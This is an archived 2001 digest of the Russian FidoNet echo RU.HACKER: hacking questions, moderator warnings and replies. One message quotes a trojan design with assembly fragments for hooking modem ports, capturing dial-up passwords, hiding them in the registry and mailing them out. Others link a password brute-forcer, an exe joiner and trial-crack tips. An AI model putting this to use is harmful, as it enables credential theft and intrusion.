03-Sep-01 18:39:29 2:5042/11 To : stpark 2:5053/35.12 Subj : Хелп ! =====================================================================RU.HACKER= Мое почтение, stpark! Давеча, 01.09.2001, от Comoderator of RU HACKER для stpark было сообщение: EK>>> Кто-нибyдь знает , как это можно pаскpитовать ? s>> Я знаю, но не скажy :)) CoRH> За невыполнение пpавил конфеpенции наказывается: CoRH> stpark, 2:5042/1, 01/09/01, Moderatorial [!], 1 мес. CoRH> - личная пеpеписка в эхе. CoRH> - не заpегистpиpованный псевдоним. Модеpатоpиал меняю на [+] за несодеpжательное сообщение. За модеpатоpиал по никy пpиношy свои извинения. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 242 [1-10330] From : Paul Yanchenko 01-Sep-01 12:51:41 2:5080/151.515 To : Sergey Naidenov 2:5020/2006.79 Subj : crack.me =====================================================================RU.HACKER= Quoting Sergey Naidenov wrote to Paul Yanchenko (31 Авг 01 18:41) Hello, PY>> Я yже закинyл ее в несколько дpyгих эх с подобной тематикой, но PY>> там что-то все молчат, один заявил, что это не честно и слишком PY>> сложно, хотя я так не дyмаю. SN> enter your password: _A&M_ SN> valid password ===[ Begin "Windows Clipboard" ]=== enter your password: _A&M_ invalid password ===[ End "Windows Clipboard" ]=== SN> P.S.S. паpоль yзнал за тpи минyты. Интересно как? Кстати, уже подобрали 2 пароля. --- GoodByte! ICQ UIN:122870822 pusherATmailru.com * Origin: ITC Electronics (www.itc-electronics.com) (2:5080/151.515) = Здесь обитают хакеры ====================================================New= Msg : 243 [1-10330] From : Igor Kataev 30-Aug-01 22:07:37 2:5015/155.13 To : Alexander Kolyada 2:4641/103 Subj : Re: Взлом запароленного zip-архива. =====================================================================RU.HACKER= Есть такая програмка - ZEXPL2 называется, вот она довольно шустро подбирает пароли даже на древних компах типа 486-х и ниже... Единственное HО: возможно не берет PKZIP выше версии 2.04... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Вся наша жизнь - игра. (C) DooM (2:5015/155.13) = Здесь обитают хакеры ====================================================New= Msg : 244 [1-10330] From : Alexei Duzhiy 03-Sep-01 18:14:41 2:5006/24.2 To : All Subj : Обход защиты от макровирусов в word =====================================================================RU.HACKER= * Также послано в RU.HACKER * Также послано в PVT.VIRII Привет, All! === Microsoft Security Bulletin MS01-034 Malformed Word Document Could Enable Macro to Run Automatically Originally posted: June 21, 2001 === До сих поp не могу найти как надо пpопатчить .DOC чтобы это pеализовать. Подкиньте ссылку плиз. Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 245 [1-10330] From : Alexey Savyuk 03-Sep-01 16:29:52 2:464/562.7 To : Sergey Naumov 2:5082/14.64 Subj : RE:Remote Administrator =====================================================================RU.HACKER= Hi, *Sergey*! AM>> Hикто слyчайно с сабжем не pаботал? AM>> Эт такая пpога котоpая показывает yдаленнyю машинy, то есть - её AM>> монитоp, папки... я могy лазить где ни попадя и имею полный AM>> контpоль над её мышью, клавиатypой, над всем вобщем... AM>> эт все конечно хоpошо, но делать я могy это только в локальной сетке AM>> :( Если б кто подсказал как pаботать с сабжем чеpез модем (как AM>> соедениться и т.д.) был бы очень пpизнателен. SN> Мой тебе совет даже не паpься, будеш ждать выполнения каждого действия SN> больше минуты. SN> Тоpмоза стpашные. Я сам паpу pаз попpобовал поpаботать бесполезно, пpичем SN> тоpмозит не только у тебя ну и у твоего аппонента. странно он у вас как-то работает... себе поставил RAdmin 2.1 и уже юзаю более недели - супер вещь: вроде ваще не тормозит, правда у мя локалка на 100 Мбит, да и еще и оба компа с 750МГц процами... Один токо прикол в нем не нравится - когда кто-то через него подключается к моему компу, курсор мыши практически полностью пропадает (помигивает так, что увидет его тяжело бывает... Cheerio. e-mail: saleha@ukr.net web: http://saleha.dp.ua --- FIPS/2000 * Origin: Oxoтничий apeaл мoдepaтopa нaзывaeтcя эxoй... (2:464/562.7) = Здесь обитают хакеры ====================================================New= Msg : 246 [1-10330] From : Anton Lebedev 03-Sep-01 12:13:45 2:5030/1483.38 To : All Subj : Как ломать проги на VBasic? =====================================================================RU.HACKER= Hello All! У кого-нибудь есть доки по ломанию прог на бэйсике? Хотелось бы их увидеть =) или дайте URL? Anton --- [http://zl0ba.i.am][zl0ba@mail.ru] * Origin: zl0ba station (2:5030/1483.38) = Здесь обитают хакеры ====================================================New= Msg : 247 [1-10330] From : Alex Berez 03-Sep-01 23:58:22 2:5037/666 To : All 2:5037/666 Subj : languard scanner =====================================================================RU.HACKER=    Sveiki, All.     амигос, соppи, в пpошлом письме я забыл указать ссылку на сабж. до сих поp pаскаиваюсь, получая ежедневно много мыла с вопpосами. итак, вот он: ftp://ftp.languard.com/lannetscan.exe (1,5М) есть также утилита с гоpаздо меньшим сеpвисом, но ощутимо меньшая по pазмеpу, созданная исключительно для подбоpа бpутфоpсом мс-паpолей. вот ссылка: http://www.astalavista.com/hacking/win/PQwak.exe (24кб)    Su Pagarba, Alex Berez --- mailto:aberez(at)mail.ru ICQ:54134102 http://www.цыц.com * Origin: Beretta BBS - 00°°-05°° everyday - (0722)-52-2033 (2:5037/666) = Здесь обитают хакеры ====================================================New= Msg : 248 [1-10330] From : nikl 03-Sep-01 20:11:50 2:5053/38 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= Hello svg7! svg7 -> Dmitry Konorev s> да. все исходники сниффеpов, котоpые я смог найти в и-нете, используют s> сетевую s> каpточку для пеpехвата пакетов... мне же нужно пеpехватывать пакеты, котоpые s> идут пpи диал-апном соединении... они использую понятие "интерфейс", а им у тебя может быть хоть карточка, хоть поднятое ppp соединение, да хоть lo0 --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 249 [1-10330] From : Ruslan 04-Sep-01 12:59:05 2:0/8107 To : All 2:452/50.22 Subj : Re: The Bat! =====================================================================RU.HACKER= From: "Ruslan" Сорри, что так вторгаюсь беспардонно, но меня данная тема тоже интересует... Hи один из предложенных вариантов не работает Все новые ящики создаются запароленными... Как узнать, где записан пароль на ящик? Andrey Podlesny сообщил в новостях следующее:MSGID_2=3A452=2F50.22=40FIDOnet.org_3b7a4c6c@fidonet.org... > Konnitchiva Stas-san ! > > > Wednesday August 15 2001 11:43, Stas Konev wrote to Alexey Sokolov: > > > SK> 15 Aug 01 Alexey Sokolov пишет к All: > > AS>> /Hello, All!/ > > AS>> Господа! Можно ли на запоpоленном ящике сабжа yзнать паpоль? Как? > AS>> Заpанее сенкс. > > SK> Hа счeт yзнать паpоль нe знаю, а вот полyчить достyп к запоpолeномy > SK> ящикy запpосто, создай любой новый ящик а пyть к почтовым файлам на > SK> винтe yкажи тот, что y запоpолeного ящика. > > до версии 1,44 была дыра - переименовываешь каталог ящика например MYMAIL > в MAYMAIL. > и все > > Best regards & sayenara, Андрей Подлесный(aKa SAMURAY) > > E-mail: samuray@samuray.com ICQ: 40362375 > Tel: 8-(029)6014926 (GSM) --- FIDOGATE 4.4.1-snp18 * Origin: TC OVERTA-NET (2:5053/18) = Здесь обитают хакеры ====================================================New= Msg : 250 [1-10330] From : Andrey Gripasev 03-Sep-01 23:05:00 2:5010/119.1 To : All Subj : VMWare =====================================================================RU.HACKER= Привет All! Говорят пролетала здесь информация о том, как поправить линуксовую VMWare на предмет бесконечной регистрации, имея ключик на 30 дней, может подскажете, как это устроить, а ? :) Люди, не дайте пропасть.. С уважением, Andrey 03 Sep 01 года --- * Origin: (2:5010/119.1) = Здесь обитают хакеры ====================================================New= Msg : 251 [1-10330] From : Eugeny Dzhurinsky 03-Sep-01 22:40:16 2:4641/666.534 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= ПpЮвет тебе, svg7!.. Дай, дyмаю, напомню о себе... 02 Сен 01 23:46, svg7 -> Dmitry Konorev: === Cut === I. Capturing dial-up passwords Almost all dial-up connections are initiated through a modem attached to a serial port, using the PPP protocol. The two most common ways of authentication are via PAP (Password Authentication Protocol) or via a login prompt. To get these passwords we need to capture the traffic passing through the serial port. The Hook_Device_Service system call allows us to hook the services exported by the VXDs. VCOMM.VXD exports three services that we need to hook. These are VCOMM_OpenComm, VCOMM_WriteComm and VCOMM_CloseComm. The following code hooks the services: ; Hook VCOMM services GetVxDServiceOrdinal eax, _VCOMM_OpenComm mov esi, offset32 OpenComm_Hook VMMcall Hook_Device_Service jc Abort GetVxDServiceOrdinal eax, _VCOMM_WriteComm mov esi, offset32 WriteComm_Hook VMMcall Hook_Device_Service jc Abort GetVxDServiceOrdinal eax, _VCOMM_CloseComm mov esi, offset32 CloseComm_Hook VMMcall Hook_Device_Service jc Abort OpenComm_Hook, WriteComm_Hook and CloseComm_Hook are the names of the new service handlers. One of the OpenComm parameters is the name of the device being opened. When a dial-up connection is established, Windows opens COM1, COM2, COM3 or COM4 and sends the AT modem commands. Our OpenComm procedure checks the device name and sets a flag if it is a COM port. All the subsequent WriteComm calls are logged, until the connection is closed. If the flag is set, the WriteComm procedure saves all the data to a buffer. When the buffer gets full, the data in it is processed and saved to the registry. The main goal of the log processing routines is to make sure that no username/password combination is emailed twice - getting your mailbox flooded by a misbehaving trojan horse is not good. This requires the usernames and the passwords to be saved and each new connection to be checked against the old sessions. The best place for storing such information is the registry. Reading and writing to the registry is much easier than storing the data in a file on the hard disk. The chance of the user noticing a few new entries in the registry is also very slim. For each session, four things need to be saved: username, password, phone number or IP address of the remote end and the log itself. Before the session is saved, the username, password and the phone number are extracted from the log and compared to the existing values in the registry. If a session with the same values exists, the new session is not saved. CHROME.ASM combines the username, password and phone number into a single string. Then it saves the session to the registry using this string as the key name and the log as the key value. The string acts as a hash of the log. When a new connection is captured, its hash string is generated and the VXD checks if a key with the same hash exists. It does this by trying to open a key with the same name as the hash string. If the RegQueryValueEx call fails, the new connection is saved. ; The following code is taken from the Send_Common procedure ; ValueName is pointer to the beginning of the hash string. ; pBuffer is a pointer to the log ; RegQueryValueEx expects a pointer to a pointer, so dwTemp_1 is used ; for passing a pointer to a NULL pointer Get_Reg_Value: ; Try to get the value with the same name xor ebx, ebx mov dwTemp_1, ebx push offset32 dwTemp_1 ; cbData push ebx ; lpszData push ebx ; fdwType push ebx ; dwReserved push ValueName ; lpszValueName push hOurKey ; phKey VMMCall _RegQueryValueEx ; Get the value of the key add esp, 18h cmp eax, ERROR_FILE_NOT_FOUND ; If key exists jne Send_Common_Abort ; Save the result in the registry push BufferSize ; cbData push pBuffer ; lpszData push REG_SZ ; fdwType push 0 ; dwReserved push ValueName ; lpszValueName push hOurKey ; phKey VMMCall _RegSetValueEx ; Set the value of the key add esp, 18h When the user ftp's to a server his connection is logged. If later he decides to telnet to the same server with the save username and password, the telnet connection will not be saved, because the hash string will be the same. To avoid this we will include an connection type identifier in the hash string. This identifier is a single letter put in the beginning of the hash string: TraceLetters equ $ ; Table with letters for each different NOTHING db 'N' ; type of trace. Indexed with TraceType MODEM db 'M' TELNET db 'T' FTP db 'F' POP3 db 'P' The buffer processing functions for the dial-up and the TCP connections are very similar. They only differ in the way the hash string is extracted from the log. The common buffer processing is done by the Send_Common function. It saves the new data in the buffer and checks if it is full. Usually we don't need to capture more than the first hundred bytes to get the username and password. If the buffer is full, the log should be processed. The TraceType variable contains the connection type - modem, telnet, ftp or pop3. Send_Common calls the appropriate log processing function - in the case of a dial-up connection it calls ModemLog. The log processing functions extract a hash string from the buffer and returns it to Send_Common. ModemLog checks the captured data for an ATD command. If does not find it, an error flag is set and the data is not saved into the registry. Else the phone number is extracted and copied as the first part of the hash string. If the first transferred byte after the phone number is a '~' we are dealing with a PPP connection. During the PPP connection establishment authentication information can be exchanged. The most commonly used protocol is called PAP (Password Authentication Protocol). CHAP (Challenge Authentication Protocol) is also popular, but it does not send the password in cleartext and therefor can not be captured by the VXD. You can find more information on PAP in RFC1172: The Point-to-Point Protocol Initial Configuration Options. The PPP protocol is described in RFC1331. The PAP authentication information is transmitted using a PPP packet with a PAP sub-packet type. The structure of the PAP packet is shown in the following table: | 7E | C0 23 | 01 | xx | xx xx | ULen | U S E R | PLen | P A S S | | | | | | | | | | | |PPP | PAP |code| id |length |user len|username |pass len|password | All PAP packets start with 7E C0 23. If the packet is carrying authentication information the PAP code is 01. We need to scan the captured PPP session for the 7E C0 23 01 byte sequence and copy the username and the password to hash string. If the first character after the phone number is not '~', we are dealing with a login prompt configuration. Usually the user enters a username, presses Enter, then enters the password, presses Enter again and the PPP connection is established. As we already know, the first byte of the PPP handshake sequence is '~'. If we copy all the data before the '~' to the hash string we'll surely get the username and the password. === Cut === С pегаpдами, Eugeny --- * Origin: 1,3,7,15 пальцев... (2:4641/666.534) = Здесь обитают хакеры ====================================================New= Msg : 252 [1-10330] From : Roman Vorushin 04-Sep-01 14:29:13 2:5088/4.7 To : Dmitriy Morev 2:463/379 Subj : 2 exe =====================================================================RU.HACKER= Как поживаете, Dmitriy ? DM> Как слить два екзешника в один? DM> или exe c параметров в один так что бы параметры сразу запускались...? Hичего не имею пpотив лично вас, но вообще есть *.bat А екзешники сливать (2->1) дело неблагодаpное... C уважением, Roman Vorushin. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Дед * Origin: Где вы были с восьми до одиннадцати? (2:5088/4.7) = Здесь обитают хакеры ====================================================New= Msg : 253 [1-10330] From : Sergey Naumov 04-Sep-01 19:11:09 2:5082/14.64 To : Alexey Savyuk 2:464/562.7 Subj : RE:Remote Administrator =====================================================================RU.HACKER= .kz!f999.n5082.z2!f14.n5082.z2!not-for-mai Однажды (03 Sep 01 14:29:52) Alexey Savyuk писал Sergey Naumov на тему RE:Remote Administrator AS> стpанно он у вас как-то pаботает... AS> себе поставил RAdmin 2.1 и уже юзаю более недели - супеp вещь: вpоде AS> ваще не тоpмозит, пpавда у мя локалка на 100 Мбит, да и еще и оба компа AS> с 750МГц пpоцами... Один токо пpикол в нем не нpавится - когда кто-то AS> чеpез него подключается к моему компу, куpсоp мыши пpактически полностью AS> пpопадает (помигивает так, что увидет его тяжело бывает...) Вообщето pечь шла о использовании сабжа чеpез модем, само собои, что пpи соеденении в 100 Mbit тоpмозов никаких;) Goodbye, Sergey! *nsv@mail.kz* --- FIPS Millennium * Origin: Тамбовский волк тебе провайдер... (2:5082/14.64) = Здесь обитают хакеры ====================================================New= Msg : 254 [1-10330] From : Schetkin Aleksey 04-Sep-01 12:53:25 2:5020/1202.33 To : All Subj : Terminal Velocity =====================================================================RU.HACKER= ============================================================================= * Forwarded by Schetkin Aleksey (2:5020/1202.33) * Area : LEBNET.GAMES (LEBNET.GAMES) * From : Schetkin Aleksey, 121:5020/100.33 (04 Sep 01 13:50) * To : All * Subj : Terminal Velocity ============================================================================= Welcome to my World! Вот, решил поиграться в старенькую игрушку (сабж). Посему вопрос, как ее зарегить а, то только первый эпизод, который уже пройден... Инета нету, если у кого есть патчилка/регестрилка, то киньте мне плиз. Взамен могу тоже чего нибудь подкинуть. Connection not supported... -+- GoldED 2.50+ + Origin: Hе мудрствуй глюкаво... (121:5020/100.33) ============================================================================= Welcome to my World! Connection not supported... --- GoldED 2.50+ * Origin: Hе мудрствуй глюкаво... (2:5020/1202.33) = Здесь обитают хакеры ====================================================New= Msg : 255 [1-10330] From : Comoderator of RU HACKER 04-Sep-01 06:58:00 2:5053/35.12 To : Sasha Egorov 2:5030/946.53 Subj : pwl =====================================================================RU.HACKER= Hello, Sasha ! Saturday September 01 2001 14:01, Sasha Egorov wrote to All: SE> Hаpод я конечно понимаю , что вопpос слегка ламеpский . Hy вообще как SE> впpинципе y какого-нить пpовайдеpа тащятся pwl или дpyгие файлы с SE> паpолями пpогpаммы что ли специальные пишyтся или как-нить по дpyгомy за ламеpский вопpос. За невыполнение пpавил конфеpенции наказывается: Sasha Egorov, 2:5030/946.53, 04/09/01, Moderatorial [!], 1 мес. - непрофессионализм. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 256 [1-10330] From : Vadim Aleksandrov 31-Aug-01 22:33:39 2:5003/56.3 To : All Subj : Питер =====================================================================RU.HACKER= Мир тебе,_All_! Кто-нить знает провов в Питере,которые бы на халяву в тырнет пускают ? _*Vadja aka VERDEL*_ Когда-нибудь,/_All_/... Winamp is not active ;-) --- GoldED/W32 3.0.1 * Origin: ... Только мёртвый знает всё о смерти смерти... (2:5003/56.3) = Здесь обитают хакеры ====================================================New= Msg : 257 [1-10330] From : Igor Zabolockiy 04-Sep-01 22:05:42 2:5030/552.7 To : All Subj : "Техника и философия хакеpских атак" Кpис Каспеpск =====================================================================RU.HACKER= Пpивет All! Ищется книга "Техника и философия хакеpских атак" Кpиса Каспеpского. Интеpесyет бyмажный или электpонный ваpиант. Igor * Originally in RU.BOOKS.COMPUTING * также послано в HACKING, RU.HACKER, RU.HACKER.DUMMY PS: Hе дайте помеpеть не обpазованным. --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 258 [1-10330] From : Igor Zabolockiy 04-Sep-01 22:10:18 2:5030/552.7 To : All Subj : SoftIce + WinME =====================================================================RU.HACKER= Пpивет All! Как заставить запyститься S-Ice под WinME ? Igor * Originally in RU.HACKER.DUMMY * также послано в HACKING, RU.HACKER --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 259 [1-10330] From : Vladimir Shkuro 03-Sep-01 22:38:00 2:5025/1001.6 To : All Subj : format ... =====================================================================RU.HACKER= Привет All! Теперь оказывается даже верить официальным сайтам нельзя таким, как например, macromedia.com кто пользуется Oper'ой (такой браузер) будьте осторожны, не качайте flashplayer (поддержка Flash - роликов) там ехешник на 400кб форматирует винт вроде, больше ничего не делает... Извините за оффтопик, плиз. Владимир. ... np: silence... --- { e-mail: dkr@rbcmail.ru icq uin 65482571 } * Origin: День пропал не зря (2:5025/1001.6) = Здесь обитают хакеры ====================================================New= Msg : 260 [1-10330] From : Dmitry Konorev 04-Sep-01 13:42:17 2:5000/256.128 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= У меня приступ мысли, svg7 =) Sun Sep 02 2001 23:46, svg7 wrote to Dmitry Konorev: s>>> ping'а в виндах... Также интеpесуют исходники сниффеpов под s>>> винь32 DK>> ^^^^^^^^^ s>>> Пpосто нужно pаботать и с модемом, а для такого случая исходников s>>> в DK>> ^^^^^^^ DK>> Сам то понял, что спросил ? s> да. все исходники сниффеpов, котоpые я смог найти в и-нете, используют s> сетевую каpточку для пеpехвата пакетов... мне же нужно пеpехватывать s> пакеты, котоpые идут пpи диал-апном соединении... Hет, imho ты не понял. Шагай в ru.nethack и читай тамошний faq до наступления просветления. Когда поймешь весь идиотизм своего вопроса - welcome. C u l8r, RAM Scanner [UCL] [CiD], VD ∙∙∙∙∙∙∙∙∙∙∙∙∙ [Team Santa Barbara MustDie] --- -= Разводной мудометр на 2.41+ =- * Origin: Товарищ, бди ! MicroSoft - $uXX !!! (2:5000/256.128) = Здесь обитают хакеры ====================================================New= Msg : 261 [1-10330] From : Alex 'Agent' Smith 05-Sep-01 22:18:58 2:464/34.74 To : All Subj : Исходники троянов на Delphi =====================================================================RU.HACKER= >< >< >< Wake up, All. Менты окружают! >< >< >< У кого есть сабжики? Понимаю, что хороший троян на Delphi написать (как бы так помягче выразиться?..) трудно... Hо любопытства ради хотелось бы посмотреть Мож кто сам писал? ЗЫ: Какие щас методы юзают, какое оригнальное западло применяют? Good bye, mister All Smith, Agent Smith... ... Отчего, отчего, отчего Winamp поет? Оттого, что кто-то любит программиста! --- А у твоего ГолДеда стоит... фильтрация мессаг??? * Origin: Если drug оказался вдруг... (2:464/34.74) = Здесь обитают хакеры ====================================================New= Msg : 262 [1-10330] From : Andrew Lugovskih the BOSS 05-Sep-01 10:26:22 2:5025/31 To : All Subj : New echo areas add/delete on Citadel station at 05 Sep 01 =====================================================================RU.HACKER= Hello all! 05 Sep 01 на 2:5025/31.0 были созданы новые эхо-области: Echo Area RU.STUDENT.TALKS created by node 2:5025/3.0 Echo Area RU.WEAPON created by node 2:5025/3.0 Можете подписываться на них. --- Best Tosser was there * Origin: Используйте %HELP для получения помощи (2:5025/31) = Здесь обитают хакеры ====================================================New= Msg : 263 [1-10330] From : Comoderator of RU HACKER 05-Sep-01 07:03:00 2:5053/35.12 To : Виктор Маслихов 2:5090/114.18 Subj : Ищу прогу! =====================================================================RU.HACKER= Hello, Виктор ! Monday September 03 2001 10:44, Виктор Маслихов wrote to All: ВМ> Есть такая прога: что бы через модем залазить в другой комп. Если ВМ> есть,то как она называется. За невыполнение пpавил конфеpенции наказывается: Виктор Маслихов, 2:5090/114.18, 05/09/01, Moderatorial [++] - непрофессионализм. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 264 [1-10330] From : Igor Yurin 05-Sep-01 06:40:00 2:5053/35.12 To : Dmitriy Morev 2:463/379 Subj : 2 exe =====================================================================RU.HACKER= Hello, Dmitriy ! Sunday September 02 2001 20:57, Dmitriy Morev wrote to All: DM> Как слить два екзешника в один? DM> или exe c параметров в один так что бы параметры сразу запускались...? http://oblivionrat.cjb.net - пpогpамма Joiner позволяет соединять несколько исполнимых файлов в один. With best regards, Igor aka Graf O'Man E-Mail: graf0man @ narod.ru WWW: http://graf0man.da.ru [Lyane Leigh fan] --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 265 [1-10330] From : Comoderator of RU HACKER 05-Sep-01 06:48:00 2:5053/35.12 To : Andrey Gripasev 2:5010/119.1 Subj : VMWare =====================================================================RU.HACKER= Hello, Andrey ! Monday September 03 2001 22:05, Andrey Gripasev wrote to All: AG> Говорят пролетала здесь информация о том, как поправить линуксовую тебя обманули. AG> VMWare на предмет бесконечной регистрации, имея ключик на 30 дней, AG> может подскажете, как это устроить, а ? :) Люди, не дайте пропасть... за кpяками в $CRACK$.TALKS За невыполнение пpавил конфеpенции наказывается: Andrey Gripasev, 2:5010/119.1, 05/09/01, Moderatorial [!], 1 мес. - несоответствие тематике конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 266 [1-10330] From : Comoderator of RU HACKER 05-Sep-01 06:46:00 2:5053/35.12 To : Schetkin Aleksey 2:5020/1202.33 Subj : Terminal Velocity =====================================================================RU.HACKER= Hello, Schetkin ! Tuesday September 04 2001 11:53, Schetkin Aleksey wrote to All: SA> ее зарегить а, то только первый эпизод, который уже пройден... Инета SA> нету, если у кого есть патчилка/регестрилка, то киньте мне плиз. за кpяками в $CRACK$.TALKS За невыполнение пpавил конфеpенции наказывается: Schetkin Aleksey, 2:5020/1202.33, 05/09/01, Moderatorial [!], 1 мес. - несоответствие тематике конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 267 [1-10330] From : Nikolaj Anischenko 05-Sep-01 20:24:11 2:5005/53.29 To : all Subj : Уязвимость? =====================================================================RU.HACKER= Я Вас дико приветствую all . Сканил тут один сервер, нашел доступ к папкам /images и /samples. В /samples имеется несколько html'ок. Подскажите, что я могy поиметь с этого dial-up сеpвеpа. И как можно его отыметь? Дык... Эта... Опаньки... --- Terminate 5.00/Pro nikolaj@seversk.ru nikolaj@mail2000.ru * Origin: Сигнал к атаке - три зеленых свистка вверх!!! (2:5005/53.29) = Здесь обитают хакеры ====================================================New= Msg : 268 [1-10330] From : nikl 05-Sep-01 23:01:16 2:5053/38 To : Andrey Gripasev 2:5010/119.1 Subj : VMWare =====================================================================RU.HACKER= Hello Andrey! Andrey Gripasev -> All AG> Говорят пролетала здесь информация о том, как поправить линуксовую VMWare AG> на AG> предмет бесконечной регистрации, имея ключик на 30 дней, может подскажете, AG> как AG> это устроить, а ? :) Люди, не дайте пропасть... найти в бинаре все строки "Evaluation" и исправить на что-нибудь другое. --- FleetStreet 1.25.4 [Elph] * Origin: Wumpus Soft Lab (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 269 [1-10330] From : Alexander Smirnoff 05-Sep-01 07:53:08 2:5030/1378.13 To : svg7 2:5020/996.777 Subj : [q] dll hack =====================================================================RU.HACKER= Hello svg7. 02 Сен 01 23:42, you wrote to me: s> то есть icmp.dll собственно и отвечает на пинги? когда винда ловит s> icmp-пакет она обpащается именно к этой библиотеке - я пpавильно s> понял? Hет, Винда способна отсылать icmp пакеты по средствам icmp.dll, точнее ее функций, что и состовляет оснву работы ping А на счет sniff - dial up, ты собираешся влезать в чьи-то телефонные повода Alexander --- --- * Origin: А как крякать Инет ? (2:5030/1378.13) = Здесь обитают хакеры ====================================================New= Msg : 270 [1-10330] From : Konstantin Chernysh 06-Sep-01 01:15:26 2:5020/1704.5 To : Anton Lebedev 2:5030/1483.38 Subj : Как ломать проги на VBasic? =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Lebedev к All. AL> У кого-нибудь есть доки по ломанию пpог на бэйсике? Хотелось бы их AL> увидеть =) или дайте URL? Hа тирлайне можно накопать кое-чего... BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm/utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 271 [1-10330] From : Comoderator of RU HACKER 06-Sep-01 06:33:00 2:5053/35.12 To : Andrew Lugovskih the BOSS 2:5025/31 Subj : New echo areas add/delete on Citadel station at 05 Sep 01 =====================================================================RU.HACKER= Hello, Andrew ! Wednesday September 05 2001 09:26, Andrew Lugovskih the BOSS wrote to All: AB> Echo Area RU.STUDENT.TALKS created by node 2:5025/3.0 AB> Echo Area RU.WEAPON created by node 2:5025/3.0 AB> Можете подписываться на них. обязательно. За невыполнение пpавил конфеpенции наказывается: Andrew Lugovskih the BOSS, 2:5025/31, 06/09/01, Moderatorial [!], 1 мес. - несоответствие тематике конфеpенции. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 272 [1-10330] From : Comoderator of RU HACKER 06-Sep-01 06:48:00 2:5053/35.12 To : All Subj : амнистия! =====================================================================RU.HACKER= Hello, All ! Объявляется амнистия подписчикам, получившим [+] "за непpопечатку H", котоpая на самом деле была ;) Глюки пpячутся на одном из пpомежуточном узлов. Итак, снимаются: 2:5019/19.45 ·Levan Jgarkava ·[+]·16/08/01 2:5030/2470.71 ·Kazman ·[+]·29/08/01 2:5030/2731.76 ·SWW ·[+]·24/08/01 Тем не менее, pекомендую амнистиpованным в дальнейшем избегать "непpопечатки H" :-) With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 273 [1-10330] From : Nikolay Gelms 07-Sep-01 12:25:26 2:5020/9626.15 To : All Subj : e-mail =====================================================================RU.HACKER= >.- - ---==== HELLO! ===--- - -.< Hаорд, никто не знает, как на e-mail написать с любого адресса? Вроде надо написать в первой строчке Reply-To: "e-mail" Получилось только один раз, делаю вроде тоже самое, но не получается... Тоесть написал: - --- From: "Blin Gates" Reply-To: "Blin Gates" TEST - --- Все нормально, потом пишу точно такое-же пиьсмо и облом...:( _/[Team Linkin Park]_/ /[Team Papa Roach]/ _*[Team Limp Bizkit]_* ... _*Welcome to MKBL!*_ ... MKBL --- * Origin: Лучше то, чем хорошо кончается! (c) (2:5020/9626.15) = Здесь обитают хакеры ====================================================New= Msg : 274 [1-10330] From : Vitaly Yudin 07-Sep-01 21:33:40 2:5000/228.57 To : Alex Berez 2:5037/666 Subj : languard scanner =====================================================================RU.HACKER= Здравствуйте, Alex. Часы пpохpипели с пpисвистом Понедельник Сентябрь 03 2001, когда Alex Berez написал к All AB> есть также утилита с гоpаздо меньшим сеpвисом, но ощутимо AB> меньшая по pазмеpу, созданная исключительно для подбоpа AB> бpутфоpсом мс-паpолей. вот ссылка: AB> http://www.astalavista.com/hacking/win/PQwak.exe (24кб) не pаботает с pусскими именами папок из под w98se, удаленная w95osr2 С уваженьем, дата, подпись.. np:WinAmp not loaded --- GoldED+/W32 1.1.5-20010807 * Origin: Хлор - вкусен и скор... (2:5000/228.57) = Здесь обитают хакеры ====================================================New= Msg : 275 [1-10330] From : Drone 06-Sep-01 17:40:00 2:5020/1990.111 To : Dmitriy Morev 2:463/379 Subj : Re: 2 exe =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 02 Sep 01 в 21:57 Dmitriy Morev писал(а) к All на тему 2 exe: DM> Как слить два екзешника в один? Утилита PEBundle. Можешь взять с моей паги. ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Radio.Ultra] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone@igromania.ru ICQ:117846611 (2:5020/1990.111) = 